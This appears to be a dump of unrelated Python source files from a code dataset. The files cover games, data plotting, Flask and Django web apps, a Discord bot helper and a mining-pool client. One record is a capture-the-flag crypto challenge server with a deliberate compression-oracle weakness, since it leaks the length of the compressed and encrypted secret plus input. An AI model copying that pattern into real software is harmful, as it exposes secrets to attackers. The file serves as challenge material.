12)\n d1 = c & 0xFF00FF0000FF00FF\n d2 = c & 0x00FF00FF00000000\n d3 = c & 0x00000000FF00FF00\n return d1 | (d2 >> 24) | (d3 << 24)\n \n\n '''\n ----------------------\n GAME RUNNING FUNCTIONS\n ----------------------\n ''' \n def placeRandomTile(self):\n empty_pos = self.emptyPos()\n if len(empty_pos) == 0: return\n \n if self.randomize: # turning this off for now\n tileval = 2 if random.random() > 0.8 else 1 # assuming a 4:1 distribution ratio\n else:\n tileval = 1\n \n id = random.choice(empty_pos)\n self.board += tileval << (4 * id)\n \n\n def placeTile(self, pos):\n self.board = self.board | 1 << (4 * pos)\n\n def swipeLeft(self):\n row1 = (0xFFFF << 48 & self.board) >> 48\n row2 = (0xFFFF << 32 & self.board) >> 32\n row3 = (0xFFFF << 16 & self.board) >> 16\n row4 = 0xFFFF & self.board\n self.board = self.tableL[row1] << 48 | self.tableL[row2] << 32 | self.tableL[row3] << 16 | self.tableL[row4]\n\n def swipeRight(self):\n row1 = (0xFFFF << 48 & self.board) >> 48\n row2 = (0xFFFF << 32 & self.board) >> 32\n row3 = (0xFFFF << 16 & self.board) >> 16\n row4 = 0xFFFF & self.board\n self.board = self.tableR[row1] << 48 | self.tableR[row2] << 32 | self.tableR[row3] << 16 | self.tableR[row4]\n\n def swipeUp(self):\n transpose = self.transpose(self.board)\n row1 = (0xFFFF << 48 & transpose) >> 48\n row2 = (0xFFFF << 32 & transpose) >> 32\n row3 = (0xFFFF << 16 & transpose) >> 16\n row4 = 0xFFFF & transpose\n self.board = self.transpose(self.tableL[row1] << 48 | self.tableL[row2] << 32 | self.tableL[row3] << 16 | self.tableL[row4])\n\n def swipeDown(self):\n transpose = self.transpose(self.board)\n row1 = (0xFFFF << 48 & transpose) >> 48\n row2 = (0xFFFF << 32 & transpose) >> 32\n row3 = (0xFFFF << 16 & transpose) >> 16\n row4 = 0xFFFF & transpose\n self.board = self.transpose(self.tableR[row1] << 48 | self.tableR[row2] << 32 | self.tableR[row3] << 16 | self.tableR[row4])\n\n\n '''\n ---------------------\n INTERACTION FUNCTIONS\n ---------------------\n '''\n\n def getScore(self):\n '''\n score = 0\n for x in range(self.size ** 2):\n val = ((0xF << x) & self.board) >> x\n if val >= 2:\n score += (val - 1) * (1 << val)\n return score\n '''\n row1 = (0xFFFF << 48 & self.board) >> 48\n row2 = (0xFFFF << 32 & self.board) >> 32\n row3 = (0xFFFF << 16 & self.board) >> 16\n row4 = 0xFFFF & self.board\n return self.scoreTable[row1] + self.scoreTable[row2] + self.scoreTable[row3] + self.scoreTable[row4]\n\n # should return a list of new boards\n def generateSuccessor(self, action):\n pre_action = Game_2048(self.board, self.tableL, self.tableR, self.scoreTable)\n if(action == 3):\n pre_action.swipeLeft()\n elif(action == 0):\n pre_action.swipeUp()\n elif(action == 1):\n pre_action.swipeRight()\n else:\n pre_action.swipeDown()\n empty_pos = pre_action.emptyPos()\n post_actions = [Game_2048(pre_action.board, pre_action.tableL, pre_action.tableR, pre_action.scoreTable) for i in range(len(empty_pos))]\n for i in range(len(empty_pos)):\n emp = empty_pos[i]\n post_actions[i].placeTile(emp)\n return post_actions\n\n def swipe(self, action):\n pre_board = self.board\n if(action == 3):\n self.swipeLeft()\n elif(action == 0):\n self.swipeUp()\n elif(action == 1):\n self.swipeRight()\n else:\n self.swipeDown()\n return pre_board != self.board\n\n def copy(self):\n return copy.deepcopy(self)\n\n def getLegalMoves(self):\n legalmoves = set()\n for action in self.options:\n tempboard = Game_2048\n tempboard.swipe(action)\n if tempboard.board != self.board:\n legalmoves.add(action)\n return legalmoves\n\n def isEnd(self):\n grid = self.bitToBoard()\n for i in range(self.size):\n for j in range(self.size):\n e = grid[i, j]\n if not e:\n return False\n if j and e == grid[i, j - 1]:\n return False\n if i and e == grid[i - 1, j]:\n return False\n return True\n\n def printScore(self):\n print('Current score is %d' % self.score)\n\n def getHighest(self):\n max = 0\n for k in range(self.size ** 2):\n val = 1 << ((self.board >> (4 * k)) & 0xF)\n if val > 1:\n if val > max:\n max = val\n return max\n\n############################################################\n\ndef playNGames2048(n):\n games = [Game_2048.fromNew() for _ in range(n)]\n numMoves = 0\n\n print('Welcome to n-2048!')\n print('You will be playing %d concurrent games of 2048!' % n)\n print('Game over when one of the %d boards reaches an end state, i.e. all spaces are filled.' % n)\n print('Score is determined by average score over the %d boards at the end.' % n)\n print('')\n\n def checkEndGame(games, k):\n if games[k].isEnd():\n print('Game over at board %d!' % k)\n games[k].printBoard()\n score = sum(games[_].getScore() for _ in range(n))\n print('Your score is %2.f!' % (score / float(n)))\n print('Your number of moves is %d' % numMoves)\n return True\n\n while 1:\n for k in range(n):\n games[k].placeRandomTile()\n games[k].printBoard()\n if checkEndGame(games, k): return\n\n allLegalMoves = games[k].options\n\n while 1 < 2:\n print(\"Legal moves are: %s\" % ', '.join(move for move in allLegalMoves))\n swipe = games[0].getInput()\n if swipe in allLegalMoves: break\n else: print(\"Please enter a valid move!\")\n\n for k in range(n):\n games[k].swipe(swipe)\n\n numMoves += 1\n\n#playNGames2048(1)\n","sub_path":"Old Files/bitstate/bitstate.py","file_name":"bitstate.py","file_ext":"py","file_size_in_byte":10228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"622357172","text":"'''Functions to fetch data from JSON file, plot them and save them to a sqlite3 database'''\n\nimport pandas as pd\nimport sqlite3\nimport matplotlib.pyplot as plt\n\n\ndef read_json(json_file):\n \"\"\"Reads a given JSON file and returns a simplified dataframe\"\"\"\n print(\"Reading JSON file: {}\".format(json_file))\n jsondata=pd.read_json(json_file)\n jsondata=jsondata[[\"fint\", \"hr\", \"prec\", \"rviento\", \"ta\", \"tamax\", \"tamin\", \"vmax\", \"vv\"]]\n print(jsondata.head())\n return jsondata\n\n\ndef plot_json(df):\n datadate=df.iloc[-1,0][:-6].replace(\"T\", \" at \")\n times=[i.split(\"T\")[1][:-6] for i in df.fint]\n plt.plot(times, df[\"ta\"], color=\"orange\", label=\"Temperatures\")\n plt.plot(times, df[\"vv\"], color=\"blue\", label=\"Wind Speed\")\n plt.legend()\n plt.xlabel(\"Last 24h\")\n plt.ylabel(\"Temperature (ºC) and Wind Speed (km/h)\")\n plt.title(\"Temperature and Wind Speed in C. UNIVERSITARIA - {}h\".format(datadate))\n plt.grid(True)\n #plt.show()\n plt.savefig(\"graph_{}.png\".format(datadate))\n\n\ndef create_db(df):\n conn=sqlite3.connect(\"aemet.db\")\n df.to_sql(\"cuniv\", conn)\n conn.close()\n\n\ndef update_db(df):\n conn=sqlite3.connect(\"aemet.db\")\n df.to_sql(\"cuniv\", conn, if_exists=\"append\", index=False)\n conn.close()\n\n\n\"\"\" def remove_duplicates():\n conn = sqlite3.connect(\"aemet.db\")\n with conn: \n cur = conn.cursor() \n cur.execute(\"SELECT fint, COUNT(*) FROM cuniv GROUP BY fint HAVING COUNT(*) > 1\")\n rows = cur.fetchall()\n conn.commit()\n for row in rows:\n print(\"Duplicate: {}\".format(row)) \"\"\"\n\n\n\nif __name__ == \"__main__\":\n j=read_json(\"data_aemet_20190420-102259.json\")\n plot_json(j)\n ","sub_path":"dber.py","file_name":"dber.py","file_ext":"py","file_size_in_byte":1700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"71907601","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n@author: gabriel\r\n\"\"\"\r\n\r\n\r\nfor n in range (16):\r\n print(flippblipp(n))\r\n\r\n\r\ndef flippblipp(n):\r\n if n % 3 == 0 and n % 5 == 0:\r\n return \"flipp blipp\"\r\n elif n % 5 == 0:\r\n return \"blipp\"\r\n elif n % 3 == 0:\r\n return \"flipp\"\r\n else:\r\n return str(n)\r\n\r\n","sub_path":"flippblipp-v2.py","file_name":"flippblipp-v2.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"83705981","text":"# import libraries\nimport zlib\nimport os\nimport string\nfrom Crypto.Cipher import AES\nfrom Crypto.Util import Counter\n\n# determine PROBLEM_KEY(lowercase letters and underscore)\nENCRYPT_KEY = bytes(bytearray.fromhex('0000000000000000000000000000000000000000000000000000000000000000'))\nPROBLEM_KEY = 'not_the_flag'\nALREADY_GUESSED = \"\"\nMIN_LENGHT = 32\n\n# encrypt function\ndef encrypt(data, ctr):\n return AES.new(ENCRYPT_KEY, AES.MODE_CTR, counter=ctr).encrypt(zlib.compress(data))\n\n# encryption service\ndef service(): \n while True:\n\n # read input\n f = raw_input(\"Encrypting service\\n\")\n if len(f) < 20:\n continue\n \n # encrypt (PROBLEM_KEY + input), encoded as UTF-8 with 64-bit counter, with 64-bit random prefix\n enc = encrypt(bytes((PROBLEM_KEY + f).encode('utf-8')), Counter.new(64, prefix=os.urandom(8)))\n print(\"%s%s\" %(enc, chr(len(enc))))","sub_path":"crypto/flatcrypt/serv-distribute.py","file_name":"serv-distribute.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"111664028","text":"from typing import List\nfrom utils import message_parsing\nfrom .constants import PERMISSIONS\nimport discord\n\n\nclass Context:\n \"\"\"\n Custom object that get's passed to commands.\n Not intended to be created manually.\n \"\"\"\n def __init__(self, msg: discord.Message, amethyst: discord.Client):\n cleaned = message_parsing.parse_prefixes(msg.content, amethyst.config['AMETHYST_PREFIXES'])\n self.msg = msg\n self.cmd = message_parsing.get_cmd(cleaned)\n self.suffix, self.args = message_parsing.get_args(cleaned)\n\n async def _send(self, content, dest, *, embed=None, file=None, files=None):\n \"\"\"Internal send function, not actually ment to be used by anyone.\"\"\"\n if dest == 'channel':\n return await self.msg.channel.send(content, embed=embed, file=file, files=files)\n elif dest == 'author':\n return await self.msg.author.send(content, embed=embed, file=file, files=files)\n else:\n raise ValueError('Destination is not `channel` or `author`.')\n\n async def send(self, content: str=None,\n *, dest: str='channel',\n embed: discord.Embed=None, file: discord.File=None,\n files: List[discord.File]=None) -> discord.Message:\n \"\"\"Sends a message to the context origin, can either be the channel or author.\"\"\"\n if content is None and not embed and not file and not files:\n raise TypeError('No content and no attachments.')\n elif content:\n # Escape bad mentions\n content = str(content).replace('@everyone', '@\\u200Beveryone').replace('@here', '@\\u200Bhere')\n\n msg = None\n\n # Splitting messages if they are larger than 2000 chars.\n # Also properly does codeblocks.\n # (Could be done nicer but eh)\n if content and len(content) > 2000:\n if content.find('```') == -1 or content.find('```', content.find('```') + 3) == -1:\n await self._send(content[:2000], dest, embed=embed, file=file, files=files)\n await self.send(content[2000:], dest=dest)\n elif content.find('```', content.find('```') + 3) + 2 < 2000:\n await self._send(content[:content.find('```', content.find('```') + 3) + 3], dest,\n embed=embed, file=file, files=files)\n await self.send(content[content.find('```', content.find('```') + 3) + 3:], dest=dest)\n else:\n start_block = content[content.find('```'):content.find('\\n', content.find('```')) + 1]\n\n if content.find('\\n', content.find('```')) == content.rfind('\\n', 0, 2000):\n split_cont = content[:1996] + '\\n```'\n content = start_block + content[1996:]\n else:\n split_cont = content[:content.rfind('\\n', 0, content.rfind('\\n', 0, 2000) + 1)][:1996] + '\\n```'\n content = start_block + content[len(split_cont) - 4:]\n\n await self.send(split_cont + content, dest=dest, embed=embed, file=file, files=files)\n else:\n msg = await self._send(content, dest, embed=embed, file=file, files=files)\n\n return msg\n\n def is_dm(self) -> bool:\n \"\"\"Check if the channel for the context is a DM or not.\"\"\"\n return isinstance(self.msg.channel, discord.DMChannel)\n\n def has_permission(self, permission: str, who: str='self') -> bool:\n \"\"\"Check if someone in context has a permission.\"\"\"\n if who not in ['self', 'author']:\n raise ValueError('Invalid value for `who` (must be `self` or `author`).')\n\n if permission not in PERMISSIONS:\n return False\n\n if who == 'self':\n return getattr(self.msg.channel.permissions_for(self.msg.guild.me), permission)\n elif who == 'author':\n return getattr(self.msg.channel.permissions_for(self.msg.author), permission)\n\n def typing(self):\n \"\"\"d.py `async with` shortcut for sending typing to a channel.\"\"\"\n return self.msg.channel.typing()\n","sub_path":"utils/dusk/context.py","file_name":"context.py","file_ext":"py","file_size_in_byte":4089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"399305102","text":"import cv2\nimport matplotlib.pyplot as plt\n\nimg_bgr = cv2.imread('aaa.jpg')\nimg_rgb = cv2.cvtColor(img_bgr, cv2.COLOR_BGR2RGB) # 转换格式\nimg_hsv = cv2.cvtColor(img_bgr, cv2.COLOR_BGR2HSV) # 转换成HSV格式\nimg_hls = cv2.cvtColor(img_bgr, cv2.COLOR_BGR2HLS) # 转换成HSL格式\nplt.figure(figsize=(18, 8))\nplt.subplot(221)\nplt.imshow(img_rgb)\nplt.title('RGB')\nplt.subplot(222)\nplt.imshow(img_bgr)\nplt.title('BGR')\nplt.subplot(223)\nplt.imshow(img_hls)\nplt.title('HLS')\nplt.subplot(224)\nplt.imshow(img_hsv)\nplt.title('HSV')\n\nplt.show()","sub_path":"image_sha.py","file_name":"image_sha.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"56592474","text":"#import PyMongo as PyMongo\nfrom flask import Flask, render_template, request\nfrom flask_pymongo import PyMongo\nimport numpy as np\nimport pickle\nimport joblib\nimport sklearn\n\n\n\nimport json\n\n\napp = Flask(__name__)\napp.config[\"MONGO_URI\"] = \"mongodb://localhost:27017/road_collusion\"\napp.config[\"MONGO_DBNAME\"] = \"road_collusion\"\nmongo = PyMongo(app)\n\ndb_collection = mongo.db.collusion_final\n\n\n################# Global Variables ################\n\nweek = [1,2,3,4,5,6,7]\nmonth = [1,2,3,4,5,6,7,8,9,10,11,12]\nyear = [1999, 2000, 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014, 2015, 2016, 2017]\nmonth_data=[]\n\n\n\n\n########## Month data counting and put it in an array #########\n\nmonth_label = list(db_collection.distinct(\"C_MNTH\"))\n\nfor items in month:\n count_month = db_collection.find({\"C_MNTH\": items}).count()\n month_data = np.append(month_data, count_month)\n\n@app.route('/')\ndef home():\n # data_array = [20, 1, 3 , 13, 1, 6, 0, 16, 90, 22]\n #print(data_array)\n\n #final_model = joblib.load(open(\"/Users/tasrifahmed/PyProjects/collusion_Project/random_forest_model.sav\", \"rb\"))\n #final_model = pickle.load(open(\"random_forest_model.sav\", \"rb\"))\n #Prediction = final_model.predict(np.array([data_array]))\n #print(Prediction)#\n\n\n\n\n count_all = db_collection.count()\n max_in_month = np.max(month_data)\n ave_in_month = int(np.average(month_data))\n\n ##### RoadWay Collusion ######\n\n def road_conf_year(year, road_config):\n config_query = db_collection.find({\"C_YEAR\":{\"$eq\":year}, \"C_RCFG\":{\"$eq\":road_config}}).count()\n return config_query\n\n year_2011_1 = road_conf_year(2011, 1)\n year_2011_2 = road_conf_year(2011, 2)\n year_2011_3 =road_conf_year(2011, 3)\n\n year_2012_1 = road_conf_year(2012, 1)\n year_2012_2 = road_conf_year(2012, 2)\n year_2012_3 = road_conf_year(2012, 3)\n\n year_2013_1 = road_conf_year(2013, 1)\n year_2013_2 = road_conf_year(2013, 2)\n year_2013_3 = road_conf_year(2013, 3)\n\n year_2014_1 = road_conf_year(2014, 1)\n year_2014_2 = road_conf_year(2014, 2)\n year_2014_3 = road_conf_year(2014, 3)\n\n year_2015_1 = road_conf_year(2015, 1)\n year_2015_2 = road_conf_year(2015, 2)\n year_2015_3 = road_conf_year(2015, 3)\n\n year_2016_1 = road_conf_year(2016, 1)\n year_2016_2 = road_conf_year(2016, 2)\n year_2016_3 = road_conf_year(2016, 3)\n\n year_2017_1 = road_conf_year(2017, 1)\n year_2017_2 = road_conf_year(2017, 2)\n year_2017_3 = road_conf_year(2017, 3)\n\n\n########## Count Year Collusion ############\n\n count_2015 = db_collection.find({\"C_YEAR\": 2015}).count()\n count_2016 = db_collection.find({\"C_YEAR\": 2016}).count()\n count_2017 = db_collection.find({\"C_YEAR\": 2017}).count()\n\n\n\n############## Colusion due to weather###############\n\n rain_count = db_collection.find({\"C_WTHR\": 3}).count()\n clear_count = db_collection.find({\"C_WTHR\": 1}).count()\n snow_count = db_collection.find({\"C_WTHR\": 4}).count()\n\n\n################ Max count Time ##############\n\n\n hour_count = db_collection.find({\"C_HOUR\": {\"$gt\": 15, \"$lt\":22}}).count()\n\n\n\n return render_template('index.html', count_all = count_all, month_max = max_in_month , average = ave_in_month,\n year_2011_2 = year_2011_2, year_2011_3= year_2011_3,year_2011_1=year_2011_1, year_2012_1=year_2012_1,\n year_2012_2 = year_2012_2, year_2012_3 = year_2012_3, year_2013_1 =year_2013_1, year_2013_2 = year_2013_2,\n year_2013_3 = year_2013_3, year_2014_1=year_2014_1,year_2014_2=year_2014_2,year_2014_3=year_2014_3,year_2015_1=year_2015_1,\n year_2015_2 = year_2015_2, year_2015_3=year_2015_3, year_2016_1=year_2016_1, year_2016_2=year_2016_2,\n year_2016_3=year_2016_3, year_2017_1=year_2017_1, year_2017_2 =year_2017_2, year_2017_3=year_2017_3,\n count_2015 = count_2015, count_2016=count_2016, count_2017=count_2017, rain_count=rain_count, clear_count=clear_count,\n snow_count = snow_count, hour_count=hour_count\n\n\n\n\n\n\n\n\n\n\n )\n\n\n@app.route('/charts', methods=[\"GET\"])\ndef charts():\n\n#Line chart making data\n\n year_data = []\n year_label = list(db_collection.distinct(\"C_YEAR\"))\n for items in year:\n count_year = db_collection.find({\"C_YEAR\": items}).count()\n year_data = np.append(year_data,count_year)\n\n count_1999 = db_collection.find({\"C_YEAR\": 1999}).count()\n count_2014 = db_collection.find({\"C_YEAR\": 2014}).count()\n count_all = db_collection.count()\n\n\n#Count Mail and female number from database\n count_male= db_collection.find({\"P_SEX\": \"M\"}).count()\n count_female = db_collection.find({\"P_SEX\": \"F\"}).count()\n\n age_list = list(db_collection.distinct(\"P_AGE\"))\n\n\n####### bar chart data ######\n count_jan = db_collection.find({\"C_MNTH\": 1}).count()\n count_oct = db_collection.find({\"C_MNTH\": 10}).count()\n\n #month_data = np.array([count_jan, count_feb, count_mar, count_apr,count_may, count_jun, count_jul, count_aug,\n # count_sep, count_oct, count_nov, count_dec])\n\n\n\n################# Age distribution on donut chart #################\n\n young_age = db_collection.find({\"P_AGE\": {\"$gt\": 15, \"$lt\":28}}).count()\n middle_age = db_collection.find({\"P_AGE\": {\"$gt\": 29, \"$lt\":45}}).count()\n old_age = db_collection.find({\"P_AGE\": {\"$gt\": 46, \"$lt\":100}}).count()\n\n\n################ Daywise Collusion ##################\n\n\n\n collusion_monday_clear = db_collection.find({\"C_WDAY\":1, \"C_WTHR\":1}).count()\n collusion_tuesday_clear = db_collection.find({\"C_WDAY\":2, \"C_WTHR\":1}).count()\n collusion_wedensday_clear = db_collection.find({\"C_WDAY\":3, \"C_WTHR\":1}).count()\n collusion_thursday_clear = db_collection.find({\"C_WDAY\":4, \"C_WTHR\":1}).count()\n collusion_friday_clear = db_collection.find({\"C_WDAY\":5, \"C_WTHR\":1}).count()\n collusion_saturday_clear = db_collection.find({\"C_WDAY\":6, \"C_WTHR\":1}).count()\n collusion_sunday_clear = db_collection.find({\"C_WDAY\":7, \"C_WTHR\":1}).count()\n data_sunny= np.array([collusion_monday_clear, collusion_tuesday_clear, collusion_wedensday_clear, collusion_thursday_clear,\n collusion_friday_clear, collusion_saturday_clear, collusion_sunday_clear ])\n total_data_clear = np.sum(data_sunny)\n\n collusion_monday_snow = db_collection.find({\"C_WDAY\":1, \"C_WTHR\":4}).count()\n collusion_tuesday_snow = db_collection.find({\"C_WDAY\":2, \"C_WTHR\":4}).count()\n collusion_wedensday_snow = db_collection.find({\"C_WDAY\":3, \"C_WTHR\":4}).count()\n collusion_thursday_snow = db_collection.find({\"C_WDAY\":4, \"C_WTHR\":4}).count()\n collusion_friday_snow = db_collection.find({\"C_WDAY\":5, \"C_WTHR\":4}).count()\n collusion_saturday_snow =db_collection.find({\"C_WDAY\":6, \"C_WTHR\":4}).count()\n collusion_sunday_snow = db_collection.find({\"C_WDAY\":7, \"C_WTHR\":4}).count()\n data_snow = np.array([collusion_monday_snow, collusion_tuesday_snow, collusion_wedensday_snow,collusion_thursday_snow,\n collusion_friday_snow, collusion_saturday_snow, collusion_sunday_snow ])\n\n total_data_snow = np.sum(data_snow)\n\n\n\n\n collusion_monday_rain = db_collection.find({\"C_WDAY\":1, \"C_WTHR\":3}).count()\n collusion_tuesday_rain = db_collection.find({\"C_WDAY\":2, \"C_WTHR\":3}).count()\n collusion_wedensday_rain = db_collection.find({\"C_WDAY\":3, \"C_WTHR\":3}).count()\n collusion_thursday_rain = db_collection.find({\"C_WDAY\":4, \"C_WTHR\":3}).count()\n collusion_friday_rain = db_collection.find({\"C_WDAY\":5, \"C_WTHR\":3}).count()\n collusion_saturday_rain =db_collection.find({\"C_WDAY\":6, \"C_WTHR\":3}).count()\n collusion_sunday_rain = db_collection.find({\"C_WDAY\":7, \"C_WTHR\":3}).count()\n data_rain = np.array([collusion_monday_rain, collusion_tuesday_rain, collusion_wedensday_rain,collusion_thursday_rain,\n collusion_friday_rain, collusion_saturday_rain, collusion_sunday_rain ])\n\n total_data_rain = np.sum(data_rain)\n ################### Day wise collusion Polar Chart ###################\n\n day_wise =[]\n\n for day in week:\n collusio_day_wise = db_collection.find({\"C_WDAY\":day}).count()\n day_wise = np.append(day_wise, collusio_day_wise)\n print(day_wise)\n\n\n\n return render_template('charts.html', year_labels = year_label, count_1999= count_1999, count_2014=count_2014,count_all=count_all,\n year_data =year_data, count_m = count_male, count_f = count_female, age = age_list,\n month_data =month_data, month_label= month_label, count_jan = count_jan, count_oct = count_oct,\n young_age=young_age, middle_age=middle_age,old_age=old_age, data_sunny=data_sunny, data_snow=data_snow, data_rain=data_rain,\n total_data_snow=total_data_snow, total_data_clear=total_data_clear, total_data_rain=total_data_rain,\n day_wise=day_wise\n\n\n )\n\n\n@app.route('/tables', methods=[\"GET\"])\ndef tables():\n all_data = list(db_collection.find({}))\n return render_template('tables.html', show_data = all_data )\n\n\n@app.route('/forms')\ndef forms():\n\n\n return render_template('form.html')\n\n@app.route('/submitted', methods=['POST'])\ndef submit():\n global year, month\n\n def year_input_change(year1):\n converter = {\n\n 0:\"1999\",\n 1:\"2000\",\n 2:\"2001\",\n 3:\"2002\",\n 4:\"2003\",\n 5:\"2004\",\n 6:\"2005\",\n 7:\"2006\",\n 8:\"2007\",\n 9:\"2008\",\n 10:\"2009\",\n 11:\"2010\",\n 12:\"2011\",\n 13:\"2012\",\n 14:\"2013\",\n 15:\"2014\",\n 16:\"2015\",\n 17:\"2016\",\n 18:\"2018\",\n 19:\"2019\",\n 20:\"2020\",\n 21:\"2021\"\n }\n return converter.get(year1, \"nothing\")\n\n\n year_initial = int(request.form.get(\"year\"))\n print(year_initial)\n year_final = year_input_change(year_initial)\n print(year_final)\n print(year_final)\n month = int(request.form.get(\"month\"))\n day = int(request.form.get(\"day\"))\n hour = int(request.form.get(\"hour\"))\n v_number = int(request.form.get(\"v_number\"))\n road = int(request.form.get(\"road\"))\n weather = int(request.form.get(\"weather\"))\n traffic = int(request.form.get(\"traffic\"))\n v_year = int(request.form.get(\"v_year\"))\n age = int(request.form.get(\"age\"))\n #db_collection.insert_one({'C_YEAR': year_final, 'C_MNTH': month , 'C_WDAY': day, 'C_HOUR': hour , 'C_VEHS': v_number , 'C_CONF': road,\n #'C_WTHR': weather, 'C_TRAF':traffic , 'V_YEAR':v_year , 'P_AGE':age })\n\n data_array = np.array([year_initial,month,day,hour,v_number,road,weather,traffic,v_year,age])\n print(data_array)\n #[9, 10, 2, 55, 2, 15, 0, 16, 94, 28]\n\n final_model = pickle.load(open(\"/Users/tasrifahmed/random_forest_model.sav\", \"rb\"))\n Prediction_initial = final_model.predict(np.array([data_array]))\n print(Prediction_initial)\n final_prediction = int(Prediction_initial[0])\n print(final_prediction)\n\n db_collection.insert_one(\n {'C_YEAR': year_final, 'C_MNTH': month, 'C_WDAY': day, 'C_HOUR': hour, 'C_VEHS': v_number, 'C_CONF': road,\n 'C_WTHR': weather, 'C_TRAF': traffic, 'V_YEAR': v_year, 'P_AGE': age, 'C_RCFG':final_prediction})\n\n def convert_prediction(prediction):\n conveter = {\n\n 0:\"Non-Intersection\",\n 1:\"At an intersection of at least two public roadways\",\n 2:\"Intersection with parking lot entrance/exit, private driveway or laneway\",\n 3:\"Railroad level crossing\",\n 4:\"Bridge, overpass, viaduct\",\n 5:\"Tunnel or underpass\",\n 6:\"Passing or climbing lane\",\n 7:\"Ramp\",\n 8:\"Traffic circle\",\n 9:\"Express lane of a freeway system\",\n 10:\"Collector lane of a freeway system\",\n 11:\"Transfer lane of a freeway system\"\n\n\n\n }\n return conveter.get(prediction, \"Sorry!!! Wrong Prediction\")\n Pretty_prediction = convert_prediction(final_prediction)\n\n print(Pretty_prediction)\n\n return render_template('submitted.html' , show_data = Pretty_prediction )\n\n\n\n\n\napp.run(debug=True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":12302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"472262761","text":"import requests, hashlib\nfrom urllib.request import Request, urlopen\nfrom dotenv import load_dotenv\nimport os\n\nload_dotenv()\n\nPoolURL = os.getenv(\"PoolURL\")\n\n\ndef get_html(link):\n try:\n print(link)\n fp = Request(link,headers={'User-Agent': 'Mozilla/5.0'})\n fp = urlopen(fp).read()\n mybytes = fp\n mystr = mybytes.decode(\"utf8\")\n return mystr\n except Exception as e:\n print(e)\n return \"Error\"\n\ndef GetWork():\n data = get_html(f\"{PoolURL}/GetWork\")\n data = data.split(\",\")\n start = int(data[0])\n end = int(data[1])\n return (start,end)\n","sub_path":"Miner/BasicPoolMiningAPI.py","file_name":"BasicPoolMiningAPI.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"394377569","text":"#!/usr/bin/python3\n\"\"\"View for user objects that handles all default RestFul API actions \"\"\"\n\nfrom api.v1.views import app_views\nfrom flask import jsonify, abort, make_response, request\nfrom models import storage\nfrom models.user import User\n\n\n@app_views.route('/users', strict_slashes=False)\ndef get_users():\n \"\"\" Retrieves the list of all user objects:\n GET /api/v1/users\n \"\"\"\n users = []\n all_users = storage.all(User).values()\n\n for each in all_users:\n users.append(each.to_dict())\n\n return jsonify(users)\n\n\n@app_views.route('/users/', strict_slashes=False)\ndef get_users_by_id(user_id):\n \"\"\" Retrieves a user object:\n GET /api/v1/users/\n \"\"\"\n user = storage.get(User, user_id)\n\n if user is None:\n abort(404)\n\n return jsonify(user.to_dict())\n\n\n@app_views.route('/users/',\n methods=['DELETE'],\n strict_slashes=False)\ndef delete_user(user_id):\n \"\"\" Deletes a user object:\n DELETE /api/v1/users/\n \"\"\"\n user = storage.get(User, user_id)\n\n if user is None:\n abort(404)\n\n user.delete()\n storage.save()\n\n return jsonify({})\n\n\n@app_views.route('/users',\n strict_slashes=False,\n methods=['POST'])\ndef create_user():\n \"\"\" Creates a user:\n POST /api/v1/users\n \"\"\"\n req_json = request.get_json()\n\n if not req_json:\n return make_response(jsonify({\"error\": \"Not a JSON\"}), 400)\n\n if \"email\" not in req_json:\n return make_response(jsonify({\"error\": \"Missing email\"}), 400)\n\n if \"password\" not in req_json:\n return make_response(jsonify({\"error\": \"Missing password\"}), 400)\n\n user = User(**req_json)\n user.save()\n\n return make_response(jsonify(user.to_dict()), 201)\n\n\n@app_views.route('/users/',\n methods=['PUT'],\n strict_slashes=False)\ndef update_user(user_id):\n \"\"\" Updates a user object:\n PUT /api/v1/users/\n \"\"\"\n upd_obj = request.get_json()\n user = storage.get(User, user_id)\n\n if user is None:\n abort(404)\n\n if not upd_obj:\n return make_response(jsonify({\"error\": \"Not a JSON\"}), 400)\n\n for key, value in upd_obj.items():\n setattr(user, key, value)\n user.save()\n\n return jsonify(user.to_dict())\n","sub_path":"api/v1/views/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":2345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"154959597","text":"from django.shortcuts import render\nfrom django_tables2 import RequestConfig\n\nfrom .models import TechPost\nfrom .tables import TechPostTable\n\n\ndef tech_post_list(request):\n \"\"\"Show tech post List\"\"\"\n\n queryset_list = TechPost.published.all()\n\n if 'key' in request.POST:\n search_key = request.POST.get('key')\n if search_key:\n queryset_list = queryset_list.filter(title__icontains=search_key)\n\n table = TechPostTable(queryset_list)\n\n if not queryset_list:\n table.empty_text = '検索結果: 0件'\n\n RequestConfig(request, paginate={'per_page': 20}).configure(table)\n\n return render(request, 'tech_blog/techpost_list.html', {'table': table})\n\n\ndef post_detail(request, post_id):\n \"\"\"Show tech post detail\"\"\"\n post = TechPost.objects.get(pk=post_id)\n\n # increment populate counter to show populate article on views.\n count = post.populate\n count += 1\n post.populate = count\n post.save()\n\n populate_posts = TechPost.objects.all().order_by('-populate')[:5]\n recent_posts = TechPost.objects.all().order_by('-created')[:5]\n\n data = {\n 'post': post,\n 'populate_posts': populate_posts,\n 'recent_posts': recent_posts,\n }\n return render(request,\n 'tech_blog/techpost_detail.html',\n data)\n","sub_path":"src/tech_blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"564654061","text":"#1 = collude\n#0 = defect\n\ndef play(opponentMove):\n if opponentMove == 'start':\n return 1\n opponentHistory = 